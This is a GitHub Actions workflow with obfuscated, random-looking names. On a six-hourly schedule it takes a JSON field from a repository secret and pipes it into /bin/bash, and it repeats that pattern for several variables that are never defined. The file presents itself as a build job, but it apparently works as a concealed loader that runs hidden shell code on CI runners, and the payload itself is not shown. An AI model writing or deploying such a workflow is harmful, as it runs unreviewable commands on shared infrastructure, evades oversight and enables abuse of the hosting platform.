name: maotongxiao9771

on:
  workflow_dispatch:
  schedule:
    - cron: '1 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maotongxiao9771
        env:
          ep90: ${{ secrets.ep90 }}
        run: |
          echo $ep90 | jq -r .nf19 | /bin/bash
          echo $ifg78 | jq -r .icd623 | /bin/bash
          echo $gknhe3 | jq -r .n47490 | /bin/bash
          echo $hqm5314 | jq -r .x5901 | /bin/bash
          echo $s04974 | jq -r .v96 | /bin/bash
          echo $vysbj3 | jq -r .axpi3551 | /bin/bash

